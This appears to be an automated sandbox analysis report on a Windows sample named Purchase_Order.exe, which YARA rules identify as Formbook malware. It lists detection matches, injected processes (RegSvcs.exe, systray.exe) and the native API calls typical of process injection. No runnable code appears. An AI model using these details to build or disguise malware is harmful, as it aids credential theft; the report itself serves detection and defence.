Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase_Order.exe
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004181C0 NtCreateFile, 4_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00418270 NtReadFile, 4_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004182F0 NtClose, 4_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004183A0 NtAllocateVirtualMemory, 4_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041826A NtReadFile, 4_2_0041826A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004182EE NtClose, 4_2_004182EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041839A NtAllocateVirtualMemory, 4_2_0041839A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_012B9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B99A0 NtCreateSection,LdrInitializeThunk, 4_2_012B99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_012B9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9840 NtDelayExecution,LdrInitializeThunk, 4_2_012B9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B98F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_012B98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A20 NtResumeThread,LdrInitializeThunk, 4_2_012B9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_012B9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A50 NtCreateFile,LdrInitializeThunk, 4_2_012B9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9540 NtReadFile,LdrInitializeThunk, 4_2_012B9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B95D0 NtClose,LdrInitializeThunk, 4_2_012B95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_012B9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_012B97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_012B9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9FE0 NtCreateMutant,LdrInitializeThunk, 4_2_012B9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_012B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_012B96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9950 NtQueueApcThread, 4_2_012B9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B99D0 NtCreateProcessEx, 4_2_012B99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9820 NtEnumerateKey, 4_2_012B9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BB040 NtSuspendThread, 4_2_012BB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B98A0 NtWriteVirtualMemory, 4_2_012B98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9B00 NtSetValueKey, 4_2_012B9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BA3B0 NtGetContextThread, 4_2_012BA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A10 NtQuerySection, 4_2_012B9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A80 NtOpenDirectoryObject, 4_2_012B9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9520 NtWaitForSingleObject, 4_2_012B9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BAD30 NtSetContextThread, 4_2_012BAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9560 NtWriteFile, 4_2_012B9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B95F0 NtQueryInformationFile, 4_2_012B95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9730 NtQueryVirtualMemory, 4_2_012B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BA710 NtOpenProcessToken, 4_2_012BA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9760 NtOpenProcess, 4_2_012B9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9770 NtSetInformationFile, 4_2_012B9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BA770 NtOpenThread, 4_2_012BA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9610 NtEnumerateValueKey, 4_2_012B9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9670 NtQueryInformationProcess, 4_2_012B9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9650 NtQueryValueKey, 4_2_012B9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B96D0 NtCreateKey, 4_2_012B96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA95D0 NtClose,LdrInitializeThunk, 16_2_04FA95D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9540 NtReadFile,LdrInitializeThunk, 16_2_04FA9540
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_04FA96E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA96D0 NtCreateKey,LdrInitializeThunk, 16_2_04FA96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_04FA9660
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9650 NtQueryValueKey,LdrInitializeThunk, 16_2_04FA9650
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9FE0 NtCreateMutant,LdrInitializeThunk, 16_2_04FA9FE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9780 NtMapViewOfSection,LdrInitializeThunk, 16_2_04FA9780
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9710 NtQueryInformationToken,LdrInitializeThunk, 16_2_04FA9710
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_04FA9860
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9840 NtDelayExecution,LdrInitializeThunk, 16_2_04FA9840
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA99A0 NtCreateSection,LdrInitializeThunk, 16_2_04FA99A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_04FA9910
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A50 NtCreateFile,LdrInitializeThunk, 16_2_04FA9A50
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA95F0 NtQueryInformationFile, 16_2_04FA95F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9560 NtWriteFile, 16_2_04FA9560
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAAD30 NtSetContextThread, 16_2_04FAAD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9520 NtWaitForSingleObject, 16_2_04FA9520
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9670 NtQueryInformationProcess, 16_2_04FA9670
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9610 NtEnumerateValueKey, 16_2_04FA9610
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA97A0 NtUnmapViewOfSection, 16_2_04FA97A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAA770 NtOpenThread, 16_2_04FAA770
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9770 NtSetInformationFile, 16_2_04FA9770
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9760 NtOpenProcess, 16_2_04FA9760
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9730 NtQueryVirtualMemory, 16_2_04FA9730
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAA710 NtOpenProcessToken, 16_2_04FAA710
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA98F0 NtReadVirtualMemory, 16_2_04FA98F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA98A0 NtWriteVirtualMemory, 16_2_04FA98A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAB040 NtSuspendThread, 16_2_04FAB040
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9820 NtEnumerateKey, 16_2_04FA9820
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA99D0 NtCreateProcessEx, 16_2_04FA99D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9950 NtQueueApcThread, 16_2_04FA9950
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A80 NtOpenDirectoryObject, 16_2_04FA9A80
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A20 NtResumeThread, 16_2_04FA9A20
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A10 NtQuerySection, 16_2_04FA9A10
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A00 NtProtectVirtualMemory, 16_2_04FA9A00
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAA3B0 NtGetContextThread, 16_2_04FAA3B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9B00 NtSetValueKey, 16_2_04FA9B00
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D81C0 NtCreateFile, 16_2_010D81C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D83A0 NtAllocateVirtualMemory, 16_2_010D83A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D8270 NtReadFile, 16_2_010D8270
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D82F0 NtClose, 16_2_010D82F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D839A NtAllocateVirtualMemory, 16_2_010D839A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D826A NtReadFile, 16_2_010D826A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D82EE NtClose, 16_2_010D82EE
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_0291C2B0 0_2_0291C2B0
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_029199A0 0_2_029199A0
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_05E60040 0_2_05E60040
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_05E667F9 0_2_05E667F9
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_05E66808 0_2_05E66808
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_004F2050 0_2_004F2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B8F6 4_2_0041B8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00401175 4_2_00401175
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00408C5C 4_2_00408C5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00408C60 4_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041C40A 4_2_0041C40A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00408C1A 4_2_00408C1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00402D8D 4_2_00402D8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00402D90 4_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00402FB0 4_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127F900 4_2_0127F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0134E824 4_2_0134E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01331002 4_2_01331002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013420A8 4_2_013420A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B090 4_2_0128B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013428EC 4_2_013428EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01342B28 4_2_01342B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129AB40 4_2_0129AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AEBB0 4_2_012AEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133DBD2 4_2_0133DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013303DA 4_2_013303DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132FA2B 4_2_0132FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013422AE 4_2_013422AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01270D20 4_2_01270D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01342D07 4_2_01342D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01341D55 4_2_01341D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A2581 4_2_012A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128D5E0 4_2_0128D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013425DD 4_2_013425DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128841F 4_2_0128841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133D466 4_2_0133D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01341FF1 4_2_01341FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0134DFCE 4_2_0134DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01296E30 4_2_01296E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133D616 4_2_0133D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01342EF7 4_2_01342EF7
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05032D07 16_2_05032D07
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05031D55 16_2_05031D55
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 16_2_05022D82
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 16_2_04F8B477
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050325DD 16_2_050325DD
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7841F 16_2_04F7841F
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7D5E0 16_2_04F7D5E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502D466 16_2_0502D466
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F92581 16_2_04F92581
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 16_2_05024496
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F60D20 16_2_04F60D20
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F86E30 16_2_04F86E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503DFCE 16_2_0503DFCE
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05031FF1 16_2_05031FF1
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502D616 16_2_0502D616
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05032EF7 16_2_05032EF7
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F920A0 16_2_04F920A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7B090 16_2_04F7B090
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8A830 16_2_04F8A830
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021002 16_2_05021002
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503E824 16_2_0503E824
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F899BF 16_2_04F899BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050320A8 16_2_050320A8
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F84120 16_2_04F84120
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050328EC 16_2_050328EC
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F6F900 16_2_04F6F900
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05032B28 16_2_05032B28
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0500CB4F 16_2_0500CB4F
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502DBD2 16_2_0502DBD2
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050203DA 16_2_050203DA
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050123E3 16_2_050123E3
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9ABD8 16_2_04F9ABD8
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0501FA2B 16_2_0501FA2B
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9EBB0 16_2_04F9EBB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050322AE 16_2_050322AE
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8AB40 16_2_04F8AB40
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024AEF 16_2_05024AEF
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8A309 16_2_04F8A309
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C2D8D 16_2_010C2D8D
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C2D90 16_2_010C2D90
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DC40A 16_2_010DC40A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C8C1A 16_2_010C8C1A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C8C5C 16_2_010C8C5C
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C8C60 16_2_010C8C60
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C2FB0 16_2_010C2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0127B150 appears 72 times
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04F6B150 appears 136 times
PE file contains strange resources
Source: Purchase_Order.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Purchase_Order.exe Binary or memory string: OriginalFilename vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000002.271664791.0000000007F50000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKygo.dll* vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000002.272587457.0000000008220000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000000.232767352.00000000005B6000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
Source: Purchase_Order.exe, 00000000.00000002.271267830.0000000007EC0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase_Order.exe
Source: Purchase_Order.exe Binary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
Uses 32bit PE files
Source: Purchase_Order.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
